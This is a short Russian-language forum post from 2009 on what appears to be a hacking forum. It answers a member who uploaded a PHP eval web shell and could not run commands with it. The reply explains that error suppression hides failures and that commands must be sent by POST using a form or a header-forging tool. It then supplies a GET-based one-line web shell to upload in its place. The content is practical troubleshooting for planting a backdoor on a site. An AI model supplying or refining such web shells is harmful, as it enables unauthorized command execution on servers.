12.11.2009, 15:06
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от sideup
Да. Конечно. Но ничего.
Пробовал <?php phpinfo(); ?> работает отлично.
Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок
не выдаёт, но что-то не пойму как команды выполнять
shell.php?cmd=id не катит.
Ошибок не выдаёт, потому что перед eval стоит @.
Чтоб команды выполнять, надо отправлять команды через POST. Для этого можно, к примеру, написать форму, а можно пользоваться программой для подделки http-заголовка. Типа InetCrack или HTTPReq
В общем заливай так: <?php eval(\$_GET['cmd']); ?>
Последний раз редактировалось Root-access; 19.01.2010 в 18:31..
Причина: опечатка
|
|
|